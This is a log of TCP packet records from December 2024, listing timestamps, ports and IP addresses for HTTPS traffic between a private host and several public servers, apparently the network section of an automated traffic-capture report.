Dec 17, 2024 08:10:09.272382021 CET	443	49700	104.21.87.65	192.168.2.7
Dec 17, 2024 08:10:09.272452116 CET	49700	443	192.168.2.7	104.21.87.65
Dec 17, 2024 08:10:09.278273106 CET	443	49700	104.21.87.65	192.168.2.7
Dec 17, 2024 08:10:09.278338909 CET	49700	443	192.168.2.7	104.21.87.65
Dec 17, 2024 08:10:09.284270048 CET	443	49700	104.21.87.65	192.168.2.7
Dec 17, 2024 08:10:09.284337044 CET	49700	443	192.168.2.7	104.21.87.65
Dec 17, 2024 08:10:09.287368059 CET	443	49700	104.21.87.65	192.168.2.7
Dec 17, 2024 08:10:09.287430048 CET	49700	443	192.168.2.7	104.21.87.65
Dec 17, 2024 08:10:09.293351889 CET	443	49700	104.21.87.65	192.168.2.7
Dec 17, 2024 08:10:09.293426037 CET	49700	443	192.168.2.7	104.21.87.65
Dec 17, 2024 08:10:09.299352884 CET	443	49700	104.21.87.65	192.168.2.7
Dec 17, 2024 08:10:09.299416065 CET	49700	443	192.168.2.7	104.21.87.65
Dec 17, 2024 08:10:09.302390099 CET	443	49700	104.21.87.65	192.168.2.7
Dec 17, 2024 08:10:09.302452087 CET	49700	443	192.168.2.7	104.21.87.65
Dec 17, 2024 08:10:09.308501005 CET	443	49700	104.21.87.65	192.168.2.7
Dec 17, 2024 08:10:09.308568954 CET	49700	443	192.168.2.7	104.21.87.65
Dec 17, 2024 08:10:09.359734058 CET	443	49700	104.21.87.65	192.168.2.7
Dec 17, 2024 08:10:09.359805107 CET	49700	443	192.168.2.7	104.21.87.65
Dec 17, 2024 08:10:09.362832069 CET	443	49700	104.21.87.65	192.168.2.7
Dec 17, 2024 08:10:09.362893105 CET	49700	443	192.168.2.7	104.21.87.65
Dec 17, 2024 08:10:09.368823051 CET	443	49700	104.21.87.65	192.168.2.7
Dec 17, 2024 08:10:09.368887901 CET	49700	443	192.168.2.7	104.21.87.65
Dec 17, 2024 08:10:09.371834040 CET	443	49700	104.21.87.65	192.168.2.7
Dec 17, 2024 08:10:09.371901035 CET	49700	443	192.168.2.7	104.21.87.65
Dec 17, 2024 08:10:09.377868891 CET	443	49700	104.21.87.65	192.168.2.7
Dec 17, 2024 08:10:09.377928972 CET	49700	443	192.168.2.7	104.21.87.65
Dec 17, 2024 08:10:09.383877993 CET	443	49700	104.21.87.65	192.168.2.7
Dec 17, 2024 08:10:09.383939981 CET	49700	443	192.168.2.7	104.21.87.65
Dec 17, 2024 08:10:09.431241989 CET	443	49700	104.21.87.65	192.168.2.7
Dec 17, 2024 08:10:09.431335926 CET	49700	443	192.168.2.7	104.21.87.65
Dec 17, 2024 08:10:09.439924002 CET	443	49700	104.21.87.65	192.168.2.7
Dec 17, 2024 08:10:09.440004110 CET	49700	443	192.168.2.7	104.21.87.65
Dec 17, 2024 08:10:09.440118074 CET	443	49700	104.21.87.65	192.168.2.7
Dec 17, 2024 08:10:09.440172911 CET	49700	443	192.168.2.7	104.21.87.65
Dec 17, 2024 08:10:09.440828085 CET	443	49700	104.21.87.65	192.168.2.7
Dec 17, 2024 08:10:09.440888882 CET	49700	443	192.168.2.7	104.21.87.65
Dec 17, 2024 08:10:09.444571972 CET	443	49700	104.21.87.65	192.168.2.7
Dec 17, 2024 08:10:09.444644928 CET	49700	443	192.168.2.7	104.21.87.65
Dec 17, 2024 08:10:09.446482897 CET	443	49700	104.21.87.65	192.168.2.7
Dec 17, 2024 08:10:09.446542025 CET	49700	443	192.168.2.7	104.21.87.65
Dec 17, 2024 08:10:09.456057072 CET	443	49700	104.21.87.65	192.168.2.7
Dec 17, 2024 08:10:09.456064939 CET	443	49700	104.21.87.65	192.168.2.7
Dec 17, 2024 08:10:09.456089973 CET	443	49700	104.21.87.65	192.168.2.7
Dec 17, 2024 08:10:09.456140995 CET	49700	443	192.168.2.7	104.21.87.65
Dec 17, 2024 08:10:09.456146955 CET	443	49700	104.21.87.65	192.168.2.7
Dec 17, 2024 08:10:09.456170082 CET	49700	443	192.168.2.7	104.21.87.65
Dec 17, 2024 08:10:09.456196070 CET	49700	443	192.168.2.7	104.21.87.65
Dec 17, 2024 08:10:09.461723089 CET	443	49700	104.21.87.65	192.168.2.7
Dec 17, 2024 08:10:09.461801052 CET	49700	443	192.168.2.7	104.21.87.65
Dec 17, 2024 08:10:09.473284006 CET	443	49700	104.21.87.65	192.168.2.7
Dec 17, 2024 08:10:09.473332882 CET	443	49700	104.21.87.65	192.168.2.7
Dec 17, 2024 08:10:09.473360062 CET	49700	443	192.168.2.7	104.21.87.65
Dec 17, 2024 08:10:09.473373890 CET	443	49700	104.21.87.65	192.168.2.7
Dec 17, 2024 08:10:09.473406076 CET	49700	443	192.168.2.7	104.21.87.65
Dec 17, 2024 08:10:09.473431110 CET	49700	443	192.168.2.7	104.21.87.65
Dec 17, 2024 08:10:09.836301088 CET	443	49700	104.21.87.65	192.168.2.7
Dec 17, 2024 08:10:09.836338043 CET	443	49700	104.21.87.65	192.168.2.7
Dec 17, 2024 08:10:09.836374998 CET	443	49700	104.21.87.65	192.168.2.7
Dec 17, 2024 08:10:09.836405039 CET	49700	443	192.168.2.7	104.21.87.65
Dec 17, 2024 08:10:09.836417913 CET	443	49700	104.21.87.65	192.168.2.7
Dec 17, 2024 08:10:09.836438894 CET	49700	443	192.168.2.7	104.21.87.65
Dec 17, 2024 08:10:09.836519003 CET	49700	443	192.168.2.7	104.21.87.65
Dec 17, 2024 08:10:09.836824894 CET	443	49700	104.21.87.65	192.168.2.7
Dec 17, 2024 08:10:09.836869955 CET	443	49700	104.21.87.65	192.168.2.7
Dec 17, 2024 08:10:09.836903095 CET	49700	443	192.168.2.7	104.21.87.65
Dec 17, 2024 08:10:09.836908102 CET	443	49700	104.21.87.65	192.168.2.7
Dec 17, 2024 08:10:09.836950064 CET	49700	443	192.168.2.7	104.21.87.65
Dec 17, 2024 08:10:09.836982012 CET	49700	443	192.168.2.7	104.21.87.65
Dec 17, 2024 08:10:09.838227987 CET	443	49700	104.21.87.65	192.168.2.7
Dec 17, 2024 08:10:09.838290930 CET	443	49700	104.21.87.65	192.168.2.7
Dec 17, 2024 08:10:09.838325977 CET	49700	443	192.168.2.7	104.21.87.65
Dec 17, 2024 08:10:09.838331938 CET	443	49700	104.21.87.65	192.168.2.7
Dec 17, 2024 08:10:09.838376999 CET	49700	443	192.168.2.7	104.21.87.65
Dec 17, 2024 08:10:09.838409901 CET	49700	443	192.168.2.7	104.21.87.65
Dec 17, 2024 08:10:09.838789940 CET	443	49700	104.21.87.65	192.168.2.7
Dec 17, 2024 08:10:09.838843107 CET	443	49700	104.21.87.65	192.168.2.7
Dec 17, 2024 08:10:09.838885069 CET	49700	443	192.168.2.7	104.21.87.65
Dec 17, 2024 08:10:09.838891029 CET	443	49700	104.21.87.65	192.168.2.7
Dec 17, 2024 08:10:09.838922977 CET	49700	443	192.168.2.7	104.21.87.65
Dec 17, 2024 08:10:09.839010954 CET	49700	443	192.168.2.7	104.21.87.65
Dec 17, 2024 08:10:09.839766026 CET	443	49699	104.98.116.138	192.168.2.7
Dec 17, 2024 08:10:09.839884043 CET	49699	443	192.168.2.7	104.98.116.138
Dec 17, 2024 08:10:09.840590000 CET	443	49700	104.21.87.65	192.168.2.7
Dec 17, 2024 08:10:09.840646982 CET	443	49700	104.21.87.65	192.168.2.7
Dec 17, 2024 08:10:09.840686083 CET	49700	443	192.168.2.7	104.21.87.65
Dec 17, 2024 08:10:09.840691090 CET	443	49700	104.21.87.65	192.168.2.7
Dec 17, 2024 08:10:09.840719938 CET	49700	443	192.168.2.7	104.21.87.65
Dec 17, 2024 08:10:09.840739012 CET	49700	443	192.168.2.7	104.21.87.65
Dec 17, 2024 08:10:09.841404915 CET	443	49700	104.21.87.65	192.168.2.7
Dec 17, 2024 08:10:09.841448069 CET	443	49700	104.21.87.65	192.168.2.7
Dec 17, 2024 08:10:09.841480970 CET	49700	443	192.168.2.7	104.21.87.65
Dec 17, 2024 08:10:09.841485977 CET	443	49700	104.21.87.65	192.168.2.7
Dec 17, 2024 08:10:09.841546059 CET	49700	443	192.168.2.7	104.21.87.65
Dec 17, 2024 08:10:09.841700077 CET	49700	443	192.168.2.7	104.21.87.65
Dec 17, 2024 08:10:09.842097998 CET	443	49700	104.21.87.65	192.168.2.7
Dec 17, 2024 08:10:09.842140913 CET	443	49700	104.21.87.65	192.168.2.7
Dec 17, 2024 08:10:09.842170954 CET	49700	443	192.168.2.7	104.21.87.65
Dec 17, 2024 08:10:09.842175961 CET	443	49700	104.21.87.65	192.168.2.7
Dec 17, 2024 08:10:09.842212915 CET	49700	443	192.168.2.7	104.21.87.65
Dec 17, 2024 08:10:09.842236042 CET	49700	443	192.168.2.7	104.21.87.65
Dec 17, 2024 08:10:09.843194008 CET	443	49700	104.21.87.65	192.168.2.7
Dec 17, 2024 08:10:09.843240023 CET	443	49700	104.21.87.65	192.168.2.7
Dec 17, 2024 08:10:09.843272924 CET	49700	443	192.168.2.7	104.21.87.65
Dec 17, 2024 08:10:09.843277931 CET	443	49700	104.21.87.65	192.168.2.7
Dec 17, 2024 08:10:09.843317032 CET	49700	443	192.168.2.7	104.21.87.65
Dec 17, 2024 08:10:09.843338013 CET	49700	443	192.168.2.7	104.21.87.65
Dec 17, 2024 08:10:09.843995094 CET	443	49700	104.21.87.65	192.168.2.7
Dec 17, 2024 08:10:09.844054937 CET	443	49700	104.21.87.65	192.168.2.7
Dec 17, 2024 08:10:09.844088078 CET	49700	443	192.168.2.7	104.21.87.65
Dec 17, 2024 08:10:09.844093084 CET	443	49700	104.21.87.65	192.168.2.7
Dec 17, 2024 08:10:09.844104052 CET	49700	443	192.168.2.7	104.21.87.65
Dec 17, 2024 08:10:09.844372988 CET	49700	443	192.168.2.7	104.21.87.65
Dec 17, 2024 08:10:09.845129967 CET	443	49700	104.21.87.65	192.168.2.7
Dec 17, 2024 08:10:09.845172882 CET	443	49700	104.21.87.65	192.168.2.7
Dec 17, 2024 08:10:09.845201969 CET	49700	443	192.168.2.7	104.21.87.65
Dec 17, 2024 08:10:09.845206976 CET	443	49700	104.21.87.65	192.168.2.7
Dec 17, 2024 08:10:09.845237970 CET	49700	443	192.168.2.7	104.21.87.65
Dec 17, 2024 08:10:09.845258951 CET	49700	443	192.168.2.7	104.21.87.65
Dec 17, 2024 08:10:09.845273018 CET	443	49700	104.21.87.65	192.168.2.7
Dec 17, 2024 08:10:09.845350981 CET	49700	443	192.168.2.7	104.21.87.65
Dec 17, 2024 08:10:09.845355988 CET	443	49700	104.21.87.65	192.168.2.7
Dec 17, 2024 08:10:09.845402002 CET	443	49700	104.21.87.65	192.168.2.7
Dec 17, 2024 08:10:09.845457077 CET	49700	443	192.168.2.7	104.21.87.65
Dec 17, 2024 08:10:09.845457077 CET	49700	443	192.168.2.7	104.21.87.65
Dec 17, 2024 08:10:09.845463037 CET	443	49700	104.21.87.65	192.168.2.7
Dec 17, 2024 08:10:09.845479012 CET	49700	443	192.168.2.7	104.21.87.65
Dec 17, 2024 08:10:09.845519066 CET	49700	443	192.168.2.7	104.21.87.65
Dec 17, 2024 08:10:12.315443993 CET	49671	443	192.168.2.7	204.79.197.203
Dec 17, 2024 08:10:13.440407038 CET	49677	443	192.168.2.7	20.50.201.200
Dec 17, 2024 08:10:14.082890987 CET	49711	443	192.168.2.7	174.138.125.138
Dec 17, 2024 08:10:14.082997084 CET	443	49711	174.138.125.138	192.168.2.7
Dec 17, 2024 08:10:14.083093882 CET	49711	443	192.168.2.7	174.138.125.138
Dec 17, 2024 08:10:14.086829901 CET	49711	443	192.168.2.7	174.138.125.138
Dec 17, 2024 08:10:14.086869955 CET	443	49711	174.138.125.138	192.168.2.7
Dec 17, 2024 08:10:15.328479052 CET	443	49711	174.138.125.138	192.168.2.7
Dec 17, 2024 08:10:15.328608990 CET	49711	443	192.168.2.7	174.138.125.138
Dec 17, 2024 08:10:15.333059072 CET	49711	443	192.168.2.7	174.138.125.138
Dec 17, 2024 08:10:15.333090067 CET	443	49711	174.138.125.138	192.168.2.7
Dec 17, 2024 08:10:15.333425045 CET	443	49711	174.138.125.138	192.168.2.7
Dec 17, 2024 08:10:15.343437910 CET	49711	443	192.168.2.7	174.138.125.138
Dec 17, 2024 08:10:15.391349077 CET	443	49711	174.138.125.138	192.168.2.7
Dec 17, 2024 08:10:15.759284019 CET	443	49711	174.138.125.138	192.168.2.7
Dec 17, 2024 08:10:15.759368896 CET	443	49711	174.138.125.138	192.168.2.7
Dec 17, 2024 08:10:15.759432077 CET	49711	443	192.168.2.7	174.138.125.138
Dec 17, 2024 08:10:15.759464979 CET	443	49711	174.138.125.138	192.168.2.7
Dec 17, 2024 08:10:15.759512901 CET	49711	443	192.168.2.7	174.138.125.138
Dec 17, 2024 08:10:15.767493010 CET	443	49711	174.138.125.138	192.168.2.7
Dec 17, 2024 08:10:15.767573118 CET	49711	443	192.168.2.7	174.138.125.138
Dec 17, 2024 08:10:15.799360991 CET	443	49711	174.138.125.138	192.168.2.7
Dec 17, 2024 08:10:15.799459934 CET	49711	443	192.168.2.7	174.138.125.138
Dec 17, 2024 08:10:15.873929977 CET	443	49711	174.138.125.138	192.168.2.7
Dec 17, 2024 08:10:15.874063015 CET	49711	443	192.168.2.7	174.138.125.138
Dec 17, 2024 08:10:15.955012083 CET	443	49711	174.138.125.138	192.168.2.7
Dec 17, 2024 08:10:15.955176115 CET	49711	443	192.168.2.7	174.138.125.138
Dec 17, 2024 08:10:15.971842051 CET	443	49711	174.138.125.138	192.168.2.7
Dec 17, 2024 08:10:15.971976042 CET	49711	443	192.168.2.7	174.138.125.138
Dec 17, 2024 08:10:15.980374098 CET	443	49711	174.138.125.138	192.168.2.7
Dec 17, 2024 08:10:15.980442047 CET	49711	443	192.168.2.7	174.138.125.138
Dec 17, 2024 08:10:15.996937037 CET	443	49711	174.138.125.138	192.168.2.7
Dec 17, 2024 08:10:15.997030020 CET	49711	443	192.168.2.7	174.138.125.138
Dec 17, 2024 08:10:16.013868093 CET	443	49711	174.138.125.138	192.168.2.7
Dec 17, 2024 08:10:16.013928890 CET	49711	443	192.168.2.7	174.138.125.138
Dec 17, 2024 08:10:16.014055967 CET	443	49711	174.138.125.138	192.168.2.7
Dec 17, 2024 08:10:16.014101028 CET	49711	443	192.168.2.7	174.138.125.138
Dec 17, 2024 08:10:16.014115095 CET	443	49711	174.138.125.138	192.168.2.7
Dec 17, 2024 08:10:16.014199972 CET	443	49711	174.138.125.138	192.168.2.7
Dec 17, 2024 08:10:16.014250040 CET	49711	443	192.168.2.7	174.138.125.138
Dec 17, 2024 08:10:16.028286934 CET	49711	443	192.168.2.7	174.138.125.138
Dec 17, 2024 08:10:17.664367914 CET	49699	443	192.168.2.7	104.98.116.138
Dec 17, 2024 08:10:17.671849012 CET	49724	443	192.168.2.7	104.98.116.138
Dec 17, 2024 08:10:17.671911001 CET	443	49724	104.98.116.138	192.168.2.7
Dec 17, 2024 08:10:17.672060013 CET	49724	443	192.168.2.7	104.98.116.138
Dec 17, 2024 08:10:17.674190998 CET	49724	443	192.168.2.7	104.98.116.138
Dec 17, 2024 08:10:17.674216986 CET	443	49724	104.98.116.138	192.168.2.7
Dec 17, 2024 08:10:17.784244061 CET	443	49699	104.98.116.138	192.168.2.7
Dec 17, 2024 08:10:21.125195980 CET	49732	443	192.168.2.7	104.21.87.65
Dec 17, 2024 08:10:21.125238895 CET	443	49732	104.21.87.65	192.168.2.7
Dec 17, 2024 08:10:21.125344038 CET	49732	443	192.168.2.7	104.21.87.65
Dec 17, 2024 08:10:21.127058029 CET	49732	443	192.168.2.7	104.21.87.65
Dec 17, 2024 08:10:21.127072096 CET	443	49732	104.21.87.65	192.168.2.7
Dec 17, 2024 08:10:21.586376905 CET	49734	443	192.168.2.7	172.217.17.46
Dec 17, 2024 08:10:21.586426020 CET	443	49734	172.217.17.46	192.168.2.7
Dec 17, 2024 08:10:21.586500883 CET	49734	443	192.168.2.7	172.217.17.46
Dec 17, 2024 08:10:21.587075949 CET	49734	443	192.168.2.7	172.217.17.46
Dec 17, 2024 08:10:21.587093115 CET	443	49734	172.217.17.46	192.168.2.7
Dec 17, 2024 08:10:22.347136021 CET	443	49732	104.21.87.65	192.168.2.7
Dec 17, 2024 08:10:22.347249985 CET	49732	443	192.168.2.7	104.21.87.65
Dec 17, 2024 08:10:22.348977089 CET	49732	443	192.168.2.7	104.21.87.65
Dec 17, 2024 08:10:22.348999977 CET	443	49732	104.21.87.65	192.168.2.7
Dec 17, 2024 08:10:22.349330902 CET	443	49732	104.21.87.65	192.168.2.7
Dec 17, 2024 08:10:22.355525970 CET	49732	443	192.168.2.7	104.21.87.65
Dec 17, 2024 08:10:22.399324894 CET	443	49732	104.21.87.65	192.168.2.7
Dec 17, 2024 08:10:23.018325090 CET	443	49732	104.21.87.65	192.168.2.7
Dec 17, 2024 08:10:23.018418074 CET	443	49732	104.21.87.65	192.168.2.7
Dec 17, 2024 08:10:23.018459082 CET	49732	443	192.168.2.7	104.21.87.65
Dec 17, 2024 08:10:23.018472910 CET	443	49732	104.21.87.65	192.168.2.7
Dec 17, 2024 08:10:23.018529892 CET	443	49732	104.21.87.65	192.168.2.7
Dec 17, 2024 08:10:23.018584013 CET	49732	443	192.168.2.7	104.21.87.65
Dec 17, 2024 08:10:23.018584967 CET	443	49732	104.21.87.65	192.168.2.7
Dec 17, 2024 08:10:23.018601894 CET	443	49732	104.21.87.65	192.168.2.7
Dec 17, 2024 08:10:23.018636942 CET	49732	443	192.168.2.7	104.21.87.65
Dec 17, 2024 08:10:23.026472092 CET	443	49732	104.21.87.65	192.168.2.7
Dec 17, 2024 08:10:23.034949064 CET	443	49732	104.21.87.65	192.168.2.7
Dec 17, 2024 08:10:23.035001993 CET	49732	443	192.168.2.7	104.21.87.65
Dec 17, 2024 08:10:23.035008907 CET	443	49732	104.21.87.65	192.168.2.7
Dec 17, 2024 08:10:23.043368101 CET	443	49732	104.21.87.65	192.168.2.7
Dec 17, 2024 08:10:23.043420076 CET	49732	443	192.168.2.7	104.21.87.65
Dec 17, 2024 08:10:23.043426991 CET	443	49732	104.21.87.65	192.168.2.7
Dec 17, 2024 08:10:23.138061047 CET	443	49732	104.21.87.65	192.168.2.7
Dec 17, 2024 08:10:23.138128042 CET	49732	443	192.168.2.7	104.21.87.65
Dec 17, 2024 08:10:23.138137102 CET	443	49732	104.21.87.65	192.168.2.7
Dec 17, 2024 08:10:23.190402031 CET	49732	443	192.168.2.7	104.21.87.65
Dec 17, 2024 08:10:23.190418005 CET	443	49732	104.21.87.65	192.168.2.7
Dec 17, 2024 08:10:23.214287043 CET	443	49732	104.21.87.65	192.168.2.7
Dec 17, 2024 08:10:23.214356899 CET	49732	443	192.168.2.7	104.21.87.65
Dec 17, 2024 08:10:23.214373112 CET	443	49732	104.21.87.65	192.168.2.7
Dec 17, 2024 08:10:23.222060919 CET	443	49732	104.21.87.65	192.168.2.7
Dec 17, 2024 08:10:23.222121000 CET	49732	443	192.168.2.7	104.21.87.65
Dec 17, 2024 08:10:23.222131014 CET	443	49732	104.21.87.65	192.168.2.7
Dec 17, 2024 08:10:23.229897022 CET	443	49732	104.21.87.65	192.168.2.7
Dec 17, 2024 08:10:23.229994059 CET	443	49732	104.21.87.65	192.168.2.7
Dec 17, 2024 08:10:23.230110884 CET	49732	443	192.168.2.7	104.21.87.65
Dec 17, 2024 08:10:23.230123997 CET	443	49732	104.21.87.65	192.168.2.7
Dec 17, 2024 08:10:23.230164051 CET	49732	443	192.168.2.7	104.21.87.65
Dec 17, 2024 08:10:23.237756968 CET	443	49732	104.21.87.65	192.168.2.7
Dec 17, 2024 08:10:23.245713949 CET	443	49732	104.21.87.65	192.168.2.7
Dec 17, 2024 08:10:23.245784044 CET	49732	443	192.168.2.7	104.21.87.65
Dec 17, 2024 08:10:23.245795012 CET	443	49732	104.21.87.65	192.168.2.7
Dec 17, 2024 08:10:23.253457069 CET	443	49732	104.21.87.65	192.168.2.7
Dec 17, 2024 08:10:23.253523111 CET	49732	443	192.168.2.7	104.21.87.65
Dec 17, 2024 08:10:23.253546000 CET	443	49732	104.21.87.65	192.168.2.7
Dec 17, 2024 08:10:23.261228085 CET	443	49732	104.21.87.65	192.168.2.7
Dec 17, 2024 08:10:23.261291027 CET	49732	443	192.168.2.7	104.21.87.65
Dec 17, 2024 08:10:23.261303902 CET	443	49732	104.21.87.65	192.168.2.7
Dec 17, 2024 08:10:23.276741982 CET	443	49732	104.21.87.65	192.168.2.7
Dec 17, 2024 08:10:23.276793003 CET	443	49732	104.21.87.65	192.168.2.7
Dec 17, 2024 08:10:23.276819944 CET	49732	443	192.168.2.7	104.21.87.65
Dec 17, 2024 08:10:23.276839972 CET	443	49732	104.21.87.65	192.168.2.7
Dec 17, 2024 08:10:23.276886940 CET	49732	443	192.168.2.7	104.21.87.65
Dec 17, 2024 08:10:23.283133984 CET	443	49732	104.21.87.65	192.168.2.7
Dec 17, 2024 08:10:23.283196926 CET	443	49732	104.21.87.65	192.168.2.7
Dec 17, 2024 08:10:23.283241034 CET	49732	443	192.168.2.7	104.21.87.65
Dec 17, 2024 08:10:23.283247948 CET	443	49732	104.21.87.65	192.168.2.7
Dec 17, 2024 08:10:23.296921015 CET	443	49734	172.217.17.46	192.168.2.7
Dec 17, 2024 08:10:23.297008038 CET	49734	443	192.168.2.7	172.217.17.46
Dec 17, 2024 08:10:23.298003912 CET	443	49734	172.217.17.46	192.168.2.7
Dec 17, 2024 08:10:23.298053980 CET	49734	443	192.168.2.7	172.217.17.46
Dec 17, 2024 08:10:23.303061962 CET	49734	443	192.168.2.7	172.217.17.46
Dec 17, 2024 08:10:23.303082943 CET	443	49734	172.217.17.46	192.168.2.7
Dec 17, 2024 08:10:23.303520918 CET	443	49734	172.217.17.46	192.168.2.7
Dec 17, 2024 08:10:23.312820911 CET	49734	443	192.168.2.7	172.217.17.46
Dec 17, 2024 08:10:23.323597908 CET	443	49732	104.21.87.65	192.168.2.7
Dec 17, 2024 08:10:23.323659897 CET	49732	443	192.168.2.7	104.21.87.65
Dec 17, 2024 08:10:23.323674917 CET	443	49732	104.21.87.65	192.168.2.7
Dec 17, 2024 08:10:23.326710939 CET	443	49732	104.21.87.65	192.168.2.7
Dec 17, 2024 08:10:23.326765060 CET	49732	443	192.168.2.7	104.21.87.65
Dec 17, 2024 08:10:23.326772928 CET	443	49732	104.21.87.65	192.168.2.7
Dec 17, 2024 08:10:23.355349064 CET	443	49734	172.217.17.46	192.168.2.7
Dec 17, 2024 08:10:23.378251076 CET	49732	443	192.168.2.7	104.21.87.65
Dec 17, 2024 08:10:23.378269911 CET	443	49732	104.21.87.65	192.168.2.7
Dec 17, 2024 08:10:23.404994965 CET	443	49732	104.21.87.65	192.168.2.7
Dec 17, 2024 08:10:23.405059099 CET	49732	443	192.168.2.7	104.21.87.65
Dec 17, 2024 08:10:23.405076027 CET	443	49732	104.21.87.65	192.168.2.7
Dec 17, 2024 08:10:23.409693003 CET	443	49732	104.21.87.65	192.168.2.7
Dec 17, 2024 08:10:23.410929918 CET	49732	443	192.168.2.7	104.21.87.65
Dec 17, 2024 08:10:23.410943985 CET	443	49732	104.21.87.65	192.168.2.7
Dec 17, 2024 08:10:23.411154032 CET	49732	443	192.168.2.7	104.21.87.65
Dec 17, 2024 08:10:23.418598890 CET	443	49732	104.21.87.65	192.168.2.7
Dec 17, 2024 08:10:23.418620110 CET	443	49732	104.21.87.65	192.168.2.7
Dec 17, 2024 08:10:23.420687914 CET	49732	443	192.168.2.7	104.21.87.65
Dec 17, 2024 08:10:23.427601099 CET	443	49732	104.21.87.65	192.168.2.7
Dec 17, 2024 08:10:23.427620888 CET	443	49732	104.21.87.65	192.168.2.7
Dec 17, 2024 08:10:23.427774906 CET	49732	443	192.168.2.7	104.21.87.65
Dec 17, 2024 08:10:23.431992054 CET	443	49732	104.21.87.65	192.168.2.7
Dec 17, 2024 08:10:23.432009935 CET	443	49732	104.21.87.65	192.168.2.7
Dec 17, 2024 08:10:23.432110071 CET	49732	443	192.168.2.7	104.21.87.65
Dec 17, 2024 08:10:23.440831900 CET	443	49732	104.21.87.65	192.168.2.7
Dec 17, 2024 08:10:23.440871000 CET	443	49732	104.21.87.65	192.168.2.7
Dec 17, 2024 08:10:23.440901995 CET	49732	443	192.168.2.7	104.21.87.65
Dec 17, 2024 08:10:23.440994024 CET	49732	443	192.168.2.7	104.21.87.65
Dec 17, 2024 08:10:23.441001892 CET	443	49732	104.21.87.65	192.168.2.7
Dec 17, 2024 08:10:23.449621916 CET	443	49732	104.21.87.65	192.168.2.7
Dec 17, 2024 08:10:23.450015068 CET	49732	443	192.168.2.7	104.21.87.65
Dec 17, 2024 08:10:23.450026035 CET	443	49732	104.21.87.65	192.168.2.7
Dec 17, 2024 08:10:23.452681065 CET	49732	443	192.168.2.7	104.21.87.65
Dec 17, 2024 08:10:23.458435059 CET	443	49732	104.21.87.65	192.168.2.7
Dec 17, 2024 08:10:23.458453894 CET	443	49732	104.21.87.65	192.168.2.7
Dec 17, 2024 08:10:23.460175991 CET	49732	443	192.168.2.7	104.21.87.65
Dec 17, 2024 08:10:23.467283010 CET	443	49732	104.21.87.65	192.168.2.7
Dec 17, 2024 08:10:23.467303991 CET	443	49732	104.21.87.65	192.168.2.7
Dec 17, 2024 08:10:23.467452049 CET	49732	443	192.168.2.7	104.21.87.65
Dec 17, 2024 08:10:23.471791983 CET	443	49732	104.21.87.65	192.168.2.7
Dec 17, 2024 08:10:23.472697973 CET	49732	443	192.168.2.7	104.21.87.65
Dec 17, 2024 08:10:23.480595112 CET	443	49732	104.21.87.65	192.168.2.7
Dec 17, 2024 08:10:23.484692097 CET	49732	443	192.168.2.7	104.21.87.65
Dec 17, 2024 08:10:23.522684097 CET	443	49732	104.21.87.65	192.168.2.7
Dec 17, 2024 08:10:23.523133039 CET	49732	443	192.168.2.7	104.21.87.65
Dec 17, 2024 08:10:23.524744987 CET	443	49732	104.21.87.65	192.168.2.7
Dec 17, 2024 08:10:23.525863886 CET	49732	443	192.168.2.7	104.21.87.65
Dec 17, 2024 08:10:23.533813953 CET	443	49732	104.21.87.65	192.168.2.7
Dec 17, 2024 08:10:23.534013987 CET	443	49732	104.21.87.65	192.168.2.7
Dec 17, 2024 08:10:23.534063101 CET	49732	443	192.168.2.7	104.21.87.65
Dec 17, 2024 08:10:23.534075975 CET	443	49732	104.21.87.65	192.168.2.7
Dec 17, 2024 08:10:23.534436941 CET	49732	443	192.168.2.7	104.21.87.65
Dec 17, 2024 08:10:23.595437050 CET	443	49732	104.21.87.65	192.168.2.7
Dec 17, 2024 08:10:23.595515013 CET	443	49732	104.21.87.65	192.168.2.7
Dec 17, 2024 08:10:23.595545053 CET	49732	443	192.168.2.7	104.21.87.65
Dec 17, 2024 08:10:23.595566988 CET	443	49732	104.21.87.65	192.168.2.7
Dec 17, 2024 08:10:23.600676060 CET	49732	443	192.168.2.7	104.21.87.65
Dec 17, 2024 08:10:23.601187944 CET	443	49732	104.21.87.65	192.168.2.7
Dec 17, 2024 08:10:23.604674101 CET	49732	443	192.168.2.7	104.21.87.65
Dec 17, 2024 08:10:23.606812000 CET	443	49732	104.21.87.65	192.168.2.7
Dec 17, 2024 08:10:23.608680010 CET	49732	443	192.168.2.7	104.21.87.65
Dec 17, 2024 08:10:23.612176895 CET	443	49732	104.21.87.65	192.168.2.7
Dec 17, 2024 08:10:23.612674952 CET	49732	443	192.168.2.7	104.21.87.65
Dec 17, 2024 08:10:23.614950895 CET	443	49732	104.21.87.65	192.168.2.7
Dec 17, 2024 08:10:23.616678953 CET	49732	443	192.168.2.7	104.21.87.65
Dec 17, 2024 08:10:23.620196104 CET	443	49732	104.21.87.65	192.168.2.7
Dec 17, 2024 08:10:23.620699883 CET	49732	443	192.168.2.7	104.21.87.65
Dec 17, 2024 08:10:23.625536919 CET	443	49732	104.21.87.65	192.168.2.7
Dec 17, 2024 08:10:23.627922058 CET	49732	443	192.168.2.7	104.21.87.65
Dec 17, 2024 08:10:23.628266096 CET	443	49732	104.21.87.65	192.168.2.7
Dec 17, 2024 08:10:23.628671885 CET	49732	443	192.168.2.7	104.21.87.65
Dec 17, 2024 08:10:23.633555889 CET	443	49732	104.21.87.65	192.168.2.7
Dec 17, 2024 08:10:23.636686087 CET	49732	443	192.168.2.7	104.21.87.65
Dec 17, 2024 08:10:23.638842106 CET	443	49732	104.21.87.65	192.168.2.7
Dec 17, 2024 08:10:23.640677929 CET	49732	443	192.168.2.7	104.21.87.65
Dec 17, 2024 08:10:23.641640902 CET	443	49732	104.21.87.65	192.168.2.7
Dec 17, 2024 08:10:23.641767025 CET	49732	443	192.168.2.7	104.21.87.65
Dec 17, 2024 08:10:23.646796942 CET	443	49732	104.21.87.65	192.168.2.7
Dec 17, 2024 08:10:23.648679018 CET	49732	443	192.168.2.7	104.21.87.65
Dec 17, 2024 08:10:23.651624918 CET	443	49732	104.21.87.65	192.168.2.7
Dec 17, 2024 08:10:23.652679920 CET	49732	443	192.168.2.7	104.21.87.65
Dec 17, 2024 08:10:23.653590918 CET	443	49732	104.21.87.65	192.168.2.7
Dec 17, 2024 08:10:23.656680107 CET	49732	443	192.168.2.7	104.21.87.65
Dec 17, 2024 08:10:23.657700062 CET	443	49732	104.21.87.65	192.168.2.7
Dec 17, 2024 08:10:23.660681963 CET	49732	443	192.168.2.7	104.21.87.65
Dec 17, 2024 08:10:23.661376953 CET	443	49732	104.21.87.65	192.168.2.7
Dec 17, 2024 08:10:23.663470984 CET	443	49732	104.21.87.65	192.168.2.7
Dec 17, 2024 08:10:23.663520098 CET	49732	443	192.168.2.7	104.21.87.65
